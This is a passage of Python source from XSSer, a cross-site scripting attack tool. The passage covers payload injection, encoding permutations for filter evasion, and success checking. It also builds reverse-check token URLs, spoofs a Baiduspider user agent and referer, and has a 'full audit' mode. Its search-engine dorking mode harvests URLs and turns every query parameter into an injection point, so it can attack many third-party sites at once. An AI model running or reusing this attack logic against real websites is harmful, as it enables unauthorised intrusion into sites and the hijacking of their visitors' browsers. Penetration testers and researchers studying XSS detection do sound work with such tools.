  1330. self.check_hash_on_target(hashing, dest_url, orig_url, payload, query_string, method, curl_handle)
  1331. else:
  1332. self.check_hash_on_target(hashing, dest_url, orig_url, payload, query_string, method, curl_handle)
  1333. self.report("")
  1334. def check_hash_on_target(self, hashing, dest_url, orig_url, payload, query_string, method, curl_handle):
  1335. options = self.options
  1336. c_info = str(curl_handle.info())
  1337. c_body = str(curl_handle.body())
  1338. if payload["browser"] == "[Data Control Protocol Injection]": # [DCP Injection]
  1339. b64_string = payload["payload"].split("[B64]")
  1340. b64_string = b64_string[1]
  1341. b64_string = b64_string.replace('PAYLOAD', hashing)
  1342. b64_string = b64encode(b64_string)
  1343. if b64_string.startswith("="):
  1344. b64_string = b64_string.replace("=", "")
  1345. hashing = b64_string
  1346. if str(hashing) in c_body and "http-code: 200" in c_info: # only add a success if hashing is on body and we have HTTP 200-OK [XSS CHECKPOINT!]
  1347. # some anti false positives checkers
  1348. if str(options.discode) in curl_handle.body(): # provided by user
  1349. self.report("[Info] Reply contains code [ --discode ] provided to be discarded... forcing failure!\n")
  1350. self.add_failure(dest_url, payload, hashing, query_string, orig_url, method) # failed!
  1351. else:
  1352. if str('/&gt;' + hashing) in curl_handle.body() or str('href=' + dest_url + hashing) in curl_handle.body() or str('content=' + dest_url + hashing) in curl_handle.body():
  1353. self.report("[Info] Reply looks like a -false positive- from here. Check it, manually... forcing discard!\n")
  1354. self.add_failure(dest_url, payload, hashing, query_string, orig_url, method) # failed!
  1355. else:
  1356. if options.discode:
  1357. self.report("[Info] Reply does NOT contain code [ --discode ] provided to be discarded... adding! ;-)\n")
  1358. self.add_success(dest_url, payload, hashing, query_string, orig_url, method) # success!
  1359. else:
  1360. self.add_failure(dest_url, payload, hashing, query_string, orig_url, method) # failed!
  1361. def add_failure(self, dest_url, payload, hashing, query_string, orig_url, method='url'):
  1362. """
  1363. Add an attack that failed to inject
  1364. """
  1365. if method == "heuristic":
  1366. self.report(" [ NOT-FOUND ] -> [ " + str(payload) + " ] : [ " + str(hashing)+ " ]")
  1367. self.hash_notfound.append((dest_url, "[Heuristic test]", method, hashing, query_string, payload, orig_url))
  1368. elif method == "hashing check":
  1369. self.report(" [ NOT-FOUND ] -> [ " + str(hashing) + " ] : [ hashing_check ]")
  1370. self.hash_notfound.append((dest_url, "[hashing check]", method, hashing, query_string, payload, orig_url))
  1371. else:
  1372. self.report(" [ NOT-FOUND ] -> [ " + hashing + " ] : [ " + method + " ]")
  1373. self.hash_notfound.append((dest_url, payload['browser'], method, hashing, query_string, payload, orig_url))
  1374. def add_success(self, dest_url, payload, hashing, query_string, orig_url, method='url'):
  1375. """
  1376. Add an attack that managed to inject the code
  1377. """
  1378. if method == "heuristic":
  1379. self.report(" [ FOUND! ] -> [ " + str(payload) + " ] : [ " + str(hashing)+ " ]")
  1380. self.hash_found.append((dest_url, "[Heuristic test]", method, hashing, query_string, payload, orig_url))
  1381. elif method == "hashing check":
  1382. self.report(" [ FOUND! ] -> [ " + str(payload) + " ] : [ " + str(hashing)+ " ]")
  1383. self.hash_found.append((dest_url, "[hashing check]", method, hashing, query_string, payload, orig_url))
  1384. else:
  1385. payload_sub = payload['payload']
  1386. self.report(" [ FOUND! ] -> [ " + hashing + " ] : [ " + method + " ] -> [ " + payload_sub + " ]")
  1387. self.hash_found.append((dest_url, payload['browser'], method, hashing, query_string, payload, orig_url))
  1388. for reporter in self._reporters:
  1389. reporter.add_success(dest_url)
  1390. if self.options.reversecheck:
  1391. if self.options.dcp or self.options.inducedcode or self.options.dom:
  1392. pass
  1393. else:
  1394. self.do_token_check(orig_url, hashing, payload, query_string, dest_url)
  1395. def do_token_check(self, orig_url, hashing, payload, query_string, dest_url):
  1396. if "VECTOR" in orig_url:
  1397. dest_url = orig_url
  1398. else:
  1399. if not dest_url.endswith("/"):
  1400. dest_url = dest_url + "/"
  1401. dest_url = orig_url + query_string + payload['payload']
  1402. tok_url = None
  1403. self_url = "http://localhost:19084/success/" + hashing
  1404. shadow_js_inj = "document.location=document.location.hash.substring(1)"
  1405. shadow_inj = "<script>" + shadow_js_inj + "</script>"
  1406. shadow_js_inj = shadow_js_inj
  1407. dest_url = dest_url.split("#")[0]
  1408. def requote(what):
  1409. return urllib.parse.quote_plus(what)
  1410. vector_and_payload = payload['payload']
  1411. _e = self.encoding_permutations
  1412. if 'XSS' in dest_url:
  1413. dest_url = dest_url.replace('XSS', vector_and_payload)
  1414. if 'X1S' in dest_url:
  1415. dest_url = dest_url.replace('XSS', vector_and_payload)
  1416. if 'VECTOR' in dest_url:
  1417. dest_url = dest_url.replace('VECTOR', vector_and_payload)
  1418. if '">PAYLOAD' in dest_url:
  1419. tok_url = dest_url.replace('">PAYLOAD', _e('">' + shadow_inj))
  1420. tok_url += '#' + self_url
  1421. elif "'>PAYLOAD" in dest_url:
  1422. tok_url = dest_url.replace("'>PAYLOAD", _e("'>" + shadow_inj))
  1423. tok_url += '#' + self_url
  1424. elif "javascript:PAYLOAD" in dest_url:
  1425. tok_url = dest_url.replace('javascript:PAYLOAD',
  1426. self.encoding_permutations("window.location='" + self_url+"';"))
  1427. tok_url = dest_url.replace("javascript:PAYLOAD",
  1428. _e("javascript:" + shadow_js_inj))
  1429. tok_url+= '#' + self_url
  1430. elif '"PAYLOAD"' in dest_url:
  1431. tok_url = dest_url.replace('"PAYLOAD"', '"' + self_url + '"')
  1432. elif "'PAYLOAD'" in dest_url:
  1433. tok_url = dest_url.replace("'PAYLOAD'", "'" + self_url + "'")
  1434. elif 'PAYLOAD' in dest_url and 'SRC' in dest_url:
  1435. tok_url = dest_url.replace('PAYLOAD', self_url)
  1436. elif "SCRIPT" in dest_url:
  1437. tok_url = dest_url.replace('PAYLOAD',
  1438. shadow_js_inj)
  1439. tok_url += '#' + self_url
  1440. elif 'onerror="PAYLOAD"' in dest_url:
  1441. tok_url = dest_url.replace('onerror="PAYLOAD"', _e('onerror="' + shadow_inj + '"'))
  1442. tok_url+= '#' + self_url
  1443. elif 'onerror="javascript:PAYLOAD"' in dest_url:
  1444. tok_url = dest_url.replace('javascript:PAYLOAD',
  1445. self.encoding_permutations("window.location='" + self_url+"';"))
  1446. tok_url = dest_url.replace('onerror="javascript:PAYLOAD"',
  1447. _e('onerror="javascript:' + shadow_js_inj + '"'))
  1448. tok_url+= '#' + self_url
  1449. elif '<PAYLOAD>' in dest_url:
  1450. tok_url = dest_url.replace("<PAYLOAD>", _e(shadow_inj))
  1451. tok_url+= '#' + self_url
  1452. elif 'PAYLOAD' in dest_url:
  1453. tok_url = dest_url.replace("PAYLOAD", _e(shadow_inj))
  1454. tok_url+= '#' + self_url
  1455. elif 'href' in dest_url and 'PAYLOAD' in dest_url:
  1456. tok_url = dest_url.replace('PAYLOAD', self_url)
  1457. elif 'HREF' in dest_url and 'PAYLOAD' in dest_url:
  1458. tok_url = dest_url.replace('PAYLOAD', self_url)
  1459. elif 'url' in dest_url and 'PAYLOAD' in dest_url:
  1460. tok_url = dest_url.replace('PAYLOAD', self_url)
  1461. self.final_attacks[hashing] = {'url': tok_url}
  1462. if tok_url:
  1463. try:
  1464. if self.options.reverseopen:
  1465. self.report("\n" + "-"*25+"\n")
  1466. self.report("[Info] Launching web browser (default) with a 'token' url...")
  1467. self._webbrowser.open(tok_url)
  1468. except:
  1469. pass
  1470. def _report_attack_failure(self, curl_handle, dest_url, payload,\
  1471. query_string, orig_url):
  1472. """
  1473. report connection failure of an attack
  1474. """
  1475. options = self.options
  1476. current_hashes = [] # to check for ongoing hashes
  1477. if payload['browser'] == "[Heuristic test]":
  1478. for key, value in self.hashed_injections.items():
  1479. if key not in current_hashes:
  1480. self.final_hashes[key] = value
  1481. current_hashes.append(key)
  1482. elif self.options.hash:
  1483. for key, value in self.hashed_injections.items():
  1484. self.final_hashes[key] = value
  1485. current_hashes.append(key)
  1486. else:
  1487. self.report("-"*45)
  1488. self.report("\n[!] Hashing: \n")
  1489. for key, value in self.hashed_injections.items():
  1490. if str(key) in str(dest_url): # GET
  1491. if key not in current_hashes:
  1492. self.report(" [ " +key+" ] : [" , value + " ]")
  1493. self.final_hashes[key] = value
  1494. current_hashes.append(key)
  1495. else:
  1496. if payload["browser"] == "[Data Control Protocol Injection]": # [DCP Injection]
  1497. b64_string = payload["payload"].split("[B64]")
  1498. b64_string = b64_string[1]
  1499. b64_string = b64_string.replace('PAYLOAD', key)
  1500. b64_string = b64encode(b64_string)
  1501. b64_string = urllib.parse.urlencode({'':b64_string})
  1502. if b64_string.startswith("="):
  1503. b64_string = b64_string.replace("=", "")
  1504. if str(b64_string) in str(dest_url):
  1505. if key not in current_hashes:
  1506. self.report(" [ " +key+" ] : [" , value + " ]")
  1507. self.final_hashes[key] = value
  1508. current_hashes.append(key)
  1509. else: # when using encoders (Str, Hex, Dec...)
  1510. payload_string = payload["payload"].replace("PAYLOAD", key)
  1511. hashed_payload = self.encoding_permutations(payload_string)
  1512. if self.options.Cem:
  1513. enc_perm = options.Cem.split(",")
  1514. for e in enc_perm:
  1515. hashed_payload = self.encoding_permutations(payload_string)
  1516. if e == "Str":
  1517. hashed_payload = hashed_payload.replace(",", "%2C")
  1518. if e == "Mix":
  1519. hashed_payload=urllib.parse.quote(hashed_payload)
  1520. if e == "Dec":
  1521. hashed_payload = hashed_payload.replace("&#", "%26%23")
  1522. if e == "Hex":
  1523. hashed_payload = hashed_payload.replace("%", "%25")
  1524. if e == "Hes":
  1525. hashed_payload = hashed_payload.replace("&#", "%26%23")
  1526. hashed_payload = hashed_payload.replace(";", "%3B")
  1527. else:
  1528. if self.options.Str:
  1529. hashed_payload = hashed_payload.replace(",", "%2C")
  1530. if self.options.Mix:
  1531. hashed_payload=urllib.parse.quote(hashed_payload)
  1532. if self.options.Dec:
  1533. hashed_payload = hashed_payload.replace("&#", "%26%23")
  1534. if self.options.Hex:
  1535. hashed_payload = hashed_payload.replace("%", "%25")
  1536. if self.options.Hes:
  1537. hashed_payload = hashed_payload.replace("&#", "%26%23")
  1538. hashed_payload = hashed_payload.replace(";", "%3B")
  1539. if str(hashed_payload) in str(dest_url):
  1540. if key not in current_hashes:
  1541. self.report(" [ " +key+" ] : [" , value + " ]")
  1542. self.final_hashes[key] = value
  1543. current_hashes.append(key)
  1544. if self.extra_hashed_injections:
  1545. for k, v in self.extra_hashed_injections.items():
  1546. payload_url = str(v[1])
  1547. if payload_url == payload["payload"]:
  1548. if k not in current_hashes:
  1549. self.report(" [ " +k+" ] : [" , v[0] + " ]")
  1550. self.final_hashes[k] = v[0]
  1551. current_hashes.append(k)
  1552. self.report("\n"+"-"*45+"\n")
  1553. if payload['browser'] == "[Heuristic test]":
  1554. self.report("[+] Checking: " + str(payload['payload']).strip('XSS'), "\n")
  1555. else:
  1556. if self.extra_hashed_injections:
  1557. extra_attacks=[]
  1558. if options.xsa:
  1559. extra_attacks.append("XSA")
  1560. if options.xsr:
  1561. extra_attacks.append("XSR")
  1562. if options.coo:
  1563. extra_attacks.append("COO")
  1564. if extra_attacks:
  1565. extra_attacks = "+ "+ str(extra_attacks)
  1566. if options.postdata:
  1567. self.report("[*] Trying: " + extra_attacks + "\n\n" + orig_url.strip(), "(POST:", query_string + ") \n")
  1568. else:
  1569. self.report("[*] Trying: " + extra_attacks + "\n\n" + dest_url.strip()+"\n")
  1570. else:
  1571. if options.postdata:
  1572. self.report("[*] Trying: \n\n" + orig_url.strip(), "(POST:", query_string + ")\n")
  1573. else:
  1574. self.report("[*] Trying: \n\n" + dest_url.strip()+"\n")
  1575. if not self.options.hash and not self.options.script:
  1576. if not "XSS" in dest_url or not "X1S" in dest_url and self.options.xsa or self.options.xsr or self.options.coo:
  1577. pass
  1578. else:
  1579. self.report("-"*45)
  1580. if payload['browser'] == "[Heuristic test]" or payload['browser'] == "[hashed_precheck_system]" or payload['browser'] == "[manual_injection]":
  1581. pass
  1582. else:
  1583. if not "XSS" in dest_url or not "X1S" in dest_url:
  1584. if self.options.xsa or self.options.xsr or self.options.coo:
  1585. pass
  1586. else:
  1587. self.report("-"*45)
  1588. self.report("\n[+] Vulnerable(s): \n\n " + payload['browser'] + "\n")
  1589. if not self.options.verbose:
  1590. self.report("-"*45 + "\n")
  1591. else:
  1592. self.report("-"*45)
  1593. self.report("\n[+] Vulnerable(s): \n\n " + payload['browser'] + "\n")
  1594. if not self.options.verbose:
  1595. self.report("-"*45 + "\n")
  1596. # statistics injections counters
  1597. if payload['browser']=="[hashed_precheck_system]" or payload['browser']=="[Heuristic test]":
  1598. self.check_positives = self.check_positives + 1
  1599. elif payload['browser']=="[Data Control Protocol Injection]":
  1600. self.dcp_injection = self.dcp_injection + 1
  1601. elif payload['browser']=="[Document Object Model Injection]":
  1602. self.dom_injection = self.dom_injection + 1
  1603. elif payload['browser']=="[Induced Injection]":
  1604. self.httpsr_injection = self.httpsr_injection + 1
  1605. elif payload['browser']=="[manual_injection]":
  1606. self.manual_injection = self.manual_injection + 1
  1607. else:
  1608. self.auto_injection = self.auto_injection +1
  1609. if not self.hashed_injections:
  1610. for k, v in self.extra_hashed_injections.items():
  1611. if k in current_hashes:
  1612. if v[0] == "XSA":
  1613. agent = v[1]
  1614. agent = agent.replace("PAYLOAD", k)
  1615. Curl.agent = agent
  1616. if v[0] == "XSR":
  1617. referer = v[1]
  1618. referer = referer.replace("PAYLOAD", k)
  1619. Curl.referer = referer
  1620. if v[0] == "COO":
  1621. cookie = v[1]
  1622. cookie = cookie.replace("PAYLOAD", k)
  1623. Curl.cookie = cookie
  1624. else:
  1625. for key, value in self.hashed_injections.items():
  1626. for k, v in self.extra_hashed_injections.items():
  1627. payload_url = v[1]
  1628. payload_url = payload_url.replace("PAYLOAD",key)
  1629. payload_url = payload_url.replace(" ", "+") # black magic!
  1630. final_dest_url = str(urllib.parse.unquote(dest_url.strip()))
  1631. if payload_url in final_dest_url:
  1632. if v[0] == "XSA":
  1633. agent = v[1]
  1634. agent = agent.replace("PAYLOAD", k)
  1635. Curl.agent = agent
  1636. if v[0] == "XSR":
  1637. referer = v[1]
  1638. referer = referer.replace("PAYLOAD", k)
  1639. Curl.referer = referer
  1640. if v[0] == "COO":
  1641. cookie = v[1]
  1642. cookie = cookie.replace("PAYLOAD", k)
  1643. Curl.cookie = cookie
  1644. else:
  1645. if k in current_hashes:
  1646. if v[0] == "XSA":
  1647. agent = v[1]
  1648. agent = agent.replace("PAYLOAD", k)
  1649. Curl.agent = agent
  1650. if v[0] == "XSR":
  1651. referer = v[1]
  1652. referer = referer.replace("PAYLOAD", k)
  1653. Curl.referer = referer
  1654. if v[0] == "COO":
  1655. cookie = v[1]
  1656. cookie = cookie.replace("PAYLOAD", k)
  1657. Curl.cookie = cookie
  1658. if options.verbose:
  1659. self.report("-"*45)
  1660. self.report("\n[+] HTTP Headers Verbose:\n")
  1661. self.report(" [Client Request]")
  1662. Curl.print_options()
  1663. self.report(" [Server Reply]\n")
  1664. self.report(curl_handle.info())
  1665. self.report("="*45)
  1666. self.report("[*] Injection(s) Results:")
  1667. self.report("="*45 + "\n")
  1668. if payload['browser']=="[Heuristic test]":
  1669. for key, value in self.final_hashes.items():
  1670. if str(key) in dest_url:
  1671. heuristic_string = key
  1672. heuristic_param = str(payload['payload']).strip('XSS')
  1673. if heuristic_param == "\\":
  1674. self.heuris_backslash_notfound = self.heuris_backslash_notfound + 1
  1675. elif heuristic_param == "/":
  1676. self.heuris_slash_notfound = self.heuris_slash_notfound + 1
  1677. elif heuristic_param == ">":
  1678. self.heuris_mayor_notfound = self.heuris_mayor_notfound + 1
  1679. elif heuristic_param == "<":
  1680. self.heuris_minor_notfound = self.heuris_minor_notfound + 1
  1681. elif heuristic_param == ";":
  1682. self.heuris_semicolon_notfound = self.heuris_semicolon_notfound + 1
  1683. elif heuristic_param == "'":
  1684. self.heuris_colon_notfound = self.heuris_colon_notfound + 1
  1685. elif heuristic_param == '"':
  1686. self.heuris_doublecolon_notfound = self.heuris_doublecolon_notfound + 1
  1687. elif heuristic_param == "=":
  1688. self.heuris_equal_notfound = self.heuris_equal_notfound + 1
  1689. self.add_failure(dest_url, heuristic_param, value, query_string, orig_url, 'heuristic') # heuristic fail
  1690. elif self.options.hash:
  1691. for key, value in self.final_hashes.items():
  1692. self.add_failure(dest_url, key, value, query_string, orig_url, 'hashing check') # hashing_check fail
  1693. self.report("\n" +"="*45)
  1694. else:
  1695. for key, value in self.final_hashes.items():
  1696. if "XSA" in value:
  1697. method = "xsa"
  1698. hashing = key
  1699. elif "XSR" in value:
  1700. method = "xsr"
  1701. hashing = key
  1702. elif "COO" in value:
  1703. method = "coo"
  1704. hashing = key
  1705. else:
  1706. method = "url"
  1707. hashing = key
  1708. if self.options.Str:
  1709. payload_string = payload["payload"].replace("PAYLOAD", key)
  1710. hashed_payload = self.encoding_permutations(payload_string)
  1711. hashed_payload = hashed_payload.replace(",", "%2C")
  1712. if str(hashed_payload) in str(dest_url):
  1713. self.add_failure(dest_url, payload, key, query_string, orig_url, value) # failed!
  1714. elif self.options.Mix:
  1715. payload_string = payload["payload"].replace("PAYLOAD", key)
  1716. hashed_payload = self.encoding_permutations(payload_string)
  1717. hashed_payload=urllib.parse.quote(hashed_payload)
  1718. if str(hashed_payload) in str(dest_url):
  1719. self.add_failure(dest_url, payload, key, query_string, orig_url, value) # failed!
  1720. elif self.options.Dec:
  1721. payload_string = payload["payload"].replace("PAYLOAD", key)
  1722. hashed_payload = self.encoding_permutations(payload_string)
  1723. hashed_payload = hashed_payload.replace("&#", "%26%23")
  1724. if str(hashed_payload) in str(dest_url):
  1725. self.add_failure(dest_url, payload, key, query_string, orig_url, value) # failed!
  1726. elif self.options.Hex:
  1727. payload_string = payload["payload"].replace("PAYLOAD", key)
  1728. hashed_payload = self.encoding_permutations(payload_string)
  1729. hashed_payload = hashed_payload.replace("%", "%25")
  1730. if str(hashed_payload) in str(dest_url):
  1731. self.add_failure(dest_url, payload, key, query_string, orig_url, value) # failed!
  1732. elif self.options.Hes:
  1733. payload_string = payload["payload"].replace("PAYLOAD", key)
  1734. hashed_payload = self.encoding_permutations(payload_string)
  1735. hashed_payload = hashed_payload.replace("&#", "%26%23")
  1736. hashed_payload = hashed_payload.replace(";", "%3B")
  1737. if str(hashed_payload) in str(dest_url):
  1738. self.add_failure(dest_url, payload, key, query_string, orig_url, value) # failed!
  1739. else:
  1740. if self.options.Cem:
  1741. enc_perm = options.Cem.split(",")
  1742. payload_string = payload["payload"].replace("PAYLOAD", key)
  1743. for e in enc_perm:
  1744. hashed_payload = self.encoding_permutations(payload_string)
  1745. if str(e) == "Str":
  1746. hashed_payload = hashed_payload.replace(",", "%2C")
  1747. if e == "Mix":
  1748. hashed_payload=urllib.parse.quote(hashed_payload)
  1749. if e == "Dec":
  1750. hashed_payload = hashed_payload.replace("&#", "%26%23")
  1751. if e == "Hex":
  1752. hashed_payload = hashed_payload.replace("%", "%25")
  1753. if e == "Hes":
  1754. hashed_payload = hashed_payload.replace("&#", "%26%23")
  1755. hashed_payload = hashed_payload.replace(";", "%3B")
  1756. if str(hashed_payload) in str(dest_url):
  1757. self.add_failure(dest_url, payload, key, query_string, orig_url, value) # failed!
  1758. else:
  1759. if str(key) in str(dest_url):
  1760. self.add_failure(dest_url, payload, key, query_string, orig_url, value) # failed!
  1761. else:
  1762. if key in current_hashes:
  1763. if method == "xsa":
  1764. self.add_failure(dest_url, payload, key, query_string, orig_url, "XSA") # failed!
  1765. elif method == "xsr":
  1766. self.add_failure(dest_url, payload, key, query_string, orig_url, "XSR") # failed!
  1767. elif method == "coo":
  1768. self.add_failure(dest_url, payload, key, query_string, orig_url, "COO") # failed!
  1769. self.report("\n" +"="*45)
  1770. if str(curl_handle.info()["http-code"]) == "404":
  1771. self.report("\n[Error] 404 Not Found: The server has not found anything matching the Request-URI\n")
  1772. elif str(curl_handle.info()["http-code"]) == "403":
  1773. self.report("\n[Error] 403 Forbidden: The server understood the request, but is refusing to fulfill it\n")
  1774. elif str(curl_handle.info()["http-code"]) == "400":
  1775. self.report("\n[Error] 400 Bad Request: The request could not be understood by the server due to malformed syntax\n")
  1776. elif str(curl_handle.info()["http-code"]) == "401":
  1777. self.report("\n[Error] 401 Unauthorized: The request requires user authentication\n\nIf you are trying to authenticate: Login is failing!\n\ncheck:\n- authentication type is correct for the type of realm (basic, digest, gss, ntlm...)\n- credentials 'user:password' are typed correctly\n")
  1778. elif str(curl_handle.info()["http-code"]) == "407":
  1779. self.report("\n[Error] 407 Proxy Authentication Required: XSSer must first authenticate itself with the proxy\n")
  1780. elif str(curl_handle.info()["http-code"]) == "408":
  1781. self.report("\n[Error] 408 Request Timeout: XSSer did not produce a request within the time that the server was prepared to wait\n")
  1782. elif str(curl_handle.info()["http-code"]) == "500":
  1783. self.report("\n[Error] 500 Internal Server Error: The server encountered an unexpected condition which prevented it from fulfilling the request\n")
  1784. elif str(curl_handle.info()["http-code"]) == "501":
  1785. self.report("\n[Error] 501 Not Implemented: The server does not support the functionality required to fulfill the request\n")
  1786. elif str(curl_handle.info()["http-code"]) == "502":
  1787. self.report("\n[Error] 502 Bad Gateway: The server received an invalid response from the upstream server\n")
  1788. elif str(curl_handle.info()["http-code"]) == "503":
  1789. self.report("\n[Error] 503 Service Unavailable: The server is currently unable to handle the request [OFFLINE!]\n")
  1790. elif str(curl_handle.info()["http-code"]) == "504":
  1791. self.report("\n[Error] 504 Gateway Timeout: The server did not receive a timely response specified by the URI (try: --ignore-proxy)\n")
  1792. elif str(curl_handle.info()["http-code"]) == "0":
  1793. self.report("\n[Error] XSSer (or your TARGET) is not working properly...\n\n - Firewall\n - Proxy\n - Target offline\n - [?] ...\n")
  1794. else:
  1795. self.report("\n[Error] Not injected!. Server responses with http-code different to: 200 OK (" + str(curl_handle.info()["http-code"]) + ")\n")
  1796. if str(curl_handle.info()["http-code"]) == "404":
  1797. self.not_connection = self.not_connection + 1
  1798. elif str(curl_handle.info()["http-code"]) == "503":
  1799. self.forwarded_connection = self.forwarded_connection + 1
  1800. else:
  1801. self.other_connection = self.other_connection + 1
  1802. def check_positive(self, curl_handle, dest_url, payload, query_string):
  1803. """
  1804. Perform extra check for positives
  1805. """
  1806. body = curl_handle.body()
  1807. pass
  1808. def create_options(self, args=None):
  1809. """
  1810. Create options for OptionParser.
  1811. """
  1812. self.optionParser = XSSerOptions()
  1813. self.options = self.optionParser.get_options(args)
  1814. if not self.options:
  1815. return False
  1816. return self.options
  1817. def _get_attack_urls(self):
  1818. """
  1819. Process payload options and make up the payload list for the attack.
  1820. """
  1821. urls = []
  1822. options = self.options
  1823. p = self.optionParser
  1824. if options.imx:
  1825. self.create_fake_image(options.imx, options.script)
  1826. return []
  1827. if options.flash:
  1828. self.create_fake_flash(options.flash, options.script)
  1829. return []
  1830. if options.update:
  1831. self.report('='*75)
  1832. self.report(str(p.version))
  1833. self.report('='*75)
  1834. try:
  1835. print("\nTrying to update to the latest stable version...\n")
  1836. Updater()
  1837. except:
  1838. print("\nSomething was wrong!. You should clone XSSer manually with:\n")
  1839. print("$ git clone https://code.03c8.net/epsylon/xsser\n")
  1840. print("\nAlso you can try this other mirror:\n")
  1841. print("$ git clone https://github.com/epsylon/xsser\n")
  1842. return []
  1843. if options.wizard: # processing wizard template
  1844. if self.user_template is not None:
  1845. self.options.statistics = True # detailed output
  1846. if self.user_template[0] == "DORKING": # mass-dorking
  1847. self.options.dork_file = True
  1848. self.options.dork_mass = True
  1849. elif "http" in self.user_template[0]: # from target url
  1850. self.options.url = self.user_template[0]
  1851. else: # from file
  1852. self.options.readfile = self.user_template[0]
  1853. if self.user_template[1] == "CRAWLER": # crawlering target
  1854. self.options.crawling = "10"
  1855. else: # manual payload (GET or POST)
  1856. if self.user_template_conntype == "GET":
  1857. self.options.getdata = self.user_template[1]
  1858. else:
  1859. self.options.postdata = self.user_template[1]
  1860. if self.user_template[2] == "Proxy: No - Spoofing: Yes":
  1861. self.options.ignoreproxy = True
  1862. self.options.agent = "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search" # spoof agent
  1863. self.options.referer = "127.0.0.1" # spoof referer
  1864. elif self.user_template[2] == "Proxy: No - Spoofing: No":
  1865. self.options.ignoreproxy = True
  1866. else: # using proxy + spoofing
  1867. self.options.agent = "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search" # spoof agent
  1868. self.options.referer = "127.0.0.1" # spoof referer
  1869. if self.user_template[2] is not None:
  1870. self.options.proxy = self.user_template[2]
  1871. else:
  1872. self.options.ignoreproxy = True
  1873. if self.user_template[3] == "Not using encoders":
  1874. pass
  1875. elif self.user_template[3] == "Hex": # Hexadecimal
  1876. self.options.Hex = True
  1877. elif self.user_template[3] == "Str+Une": # StringFromCharCode()+Unescape()
  1878. self.options.Str = True
  1879. self.options.Une = True
  1880. else: # Character encoding mutations
  1881. self.options.Cem = self.user_template[3]
  1882. if self.user_template[4] == "Alertbox": # Classic AlertBox injection
  1883. self.options.finalpayload = "<script>alert('XSS');</script>"
  1884. else:
  1885. if self.user_template[4] is not None: # Inject user script
  1886. self.options.finalpayload = self.user_template[4]
  1887. else: # not final injection
  1888. pass
  1889. else: # exit
  1890. return
  1891. if options.target: # miau!
  1892. self.report('='*75)
  1893. self.report(str(p.version))
  1894. self.report('='*75)
  1895. self.report("Testing [Full XSS audit]... ;-)")
  1896. self.report('='*75)
  1897. self.report("\n[Info] The following actions will be performed at the end:\n")
  1898. self.report(" 1- Output with detailed statistics\n")
  1899. self.report(" 2- Export results to files: \n\n - a) XSSreport.raw \n - b) XSSer_<target>_<datetime>.xml\n")
  1900. self.options.crawling = "99999" # set max num of urls to crawl
  1901. self.options.crawler_width = "5" # set max num of deeping levels
  1902. self.options.statistics = True # detailed output
  1903. self.options.timeout = "60" # timeout
  1904. self.options.retries = "2" # retries
  1905. self.options.delay = "5" # delay
  1906. self.options.threads = "10" # threads
  1907. self.options.followred = True # follow redirs
  1908. self.options.nohead = False # HEAD check
  1909. self.options.reversecheck = True # try to establish a reverse connection
  1910. self.options.fuzz = True # autofuzzing
  1911. self.options.coo = True # COO
  1912. self.options.xsa = True # XSA
  1913. self.options.xsr = True # XSR
  1914. self.options.dcp = True # DCP
  1915. self.options.dom = True # DOM
  1916. self.options.inducedcode = True # Induced
  1917. self.options.fileoutput = True # Important: export results to file (.raw)
  1918. self.options.filexml = "XSSer_" + str(self.options.target) + "_" + str(datetime.datetime.now())+".xml" # export xml
  1919. self.check_trace() # XST
  1920. urls = [options.target]
  1921. if options.url:
  1922. self.report('='*75)
  1923. self.report(str(p.version))
  1924. self.report('='*75)
  1925. if self.options.crawling:
  1926. self.report("Testing [XSS from CRAWLER]...")
  1927. else:
  1928. self.report("Testing [XSS from URL]...")
  1929. self.report('='*75)
  1930. urls = [options.url]
  1931. elif options.readfile:
  1932. self.report('='*75)
  1933. self.report(str(p.version))
  1934. self.report('='*75)
  1935. self.report("Testing [XSS from FILE]...")
  1936. self.report('='*75)
  1937. try:
  1938. f = open(options.readfile)
  1939. urls = f.readlines()
  1940. urls = [ line.replace('\n','') for line in urls ]
  1941. f.close()
  1942. except:
  1943. import os.path
  1944. if os.path.exists(options.readfile) == True:
  1945. self.report('\nThere are some errors opening the file: ', options.readfile, "\n")
  1946. else:
  1947. self.report('\nCannot found file: ', options.readfile, "\n")
  1948. elif options.dork: # dork a query
  1949. self.report('='*75)
  1950. self.report(str(p.version))
  1951. self.report('='*75)
  1952. self.report("Testing [XSS from DORK]... Good luck! ;-)")
  1953. self.report('='*75)
  1954. if options.dork_mass: # massive dorkering
  1955. for e in self.search_engines:
  1956. try:
  1957. dorker = Dorker(e)
  1958. urls = dorker.dork(options.dork)
  1959. i = 0
  1960. for u in urls: # replace original parameter for injection keyword (XSS)
  1961. p_uri = urlparse(u)
  1962. uri = p_uri.netloc
  1963. path = p_uri.path
  1964. target_params = parse_qs(urlparse(u).query, keep_blank_values=True)
  1965. for key, value in target_params.items(): # parse params to apply keywords
  1966. for v in value:
  1967. target_params[key] = 'XSS'
  1968. target_url_params = urllib.parse.urlencode(target_params)
  1969. u = p_uri.scheme + "://" + uri + path + "?" + target_url_params
  1970. urls[i] = u
  1971. i = i + 1
  1972. except Exception as e:
  1973. for reporter in self._reporters:
  1974. reporter.mosquito_crashed(dorker.search_url, str(e.message))
  1975. else:
  1976. if urls is not None:
  1977. for url in urls:
  1978. for reporter in self._reporters:
  1979. reporter.add_link(dorker.search_url, url)
  1980. else:
  1981. if not options.dork_engine:
  1982. options.dork_engine = 'duck' # default search engine [26-08/2019]
  1983. dorker = Dorker(options.dork_engine)
  1984. try:
  1985. urls = dorker.dork(options.dork)
  1986. i = 0
  1987. for u in urls: # replace original parameter for injection keyword (XSS)
  1988. p_uri = urlparse(u)
  1989. uri = p_uri.netloc
  1990. path = p_uri.path
  1991. target_params = parse_qs(urlparse(u).query, keep_blank_values=True)
  1992. for key, value in target_params.items(): # parse params to apply keywords
  1993. for v in value:
  1994. target_params[key] = 'XSS'
  1995. target_url_params = urllib.parse.urlencode(target_params)
  1996. u = p_uri.scheme + "://" + uri + path + "?" + target_url_params
  1997. urls[i] = u
  1998. i = i + 1
  1999. except Exception as e:
  2000. for reporter in self._reporters:
  2001. reporter.mosquito_crashed(dorker.search_url, str(e.message))
  2002. else:
  2003. if urls is not None:
  2004. for url in urls:
  2005. for reporter in self._reporters:
  2006. reporter.add_link(dorker.search_url, url)
  2007. elif options.dork_file: # dork from file ('core/fuzzing/dorks.txt')
  2008. self.report('='*75)
  2009. self.report(str(p.version))
  2010. self.report('='*75)
  2011. self.report("Testing [XSS from DORK]... Good luck! ;-)")
  2012. self.report('='*75)
  2013. try:
  2014. f = open('core/fuzzing/dorks.txt')
  2015. dorks = f.readlines()
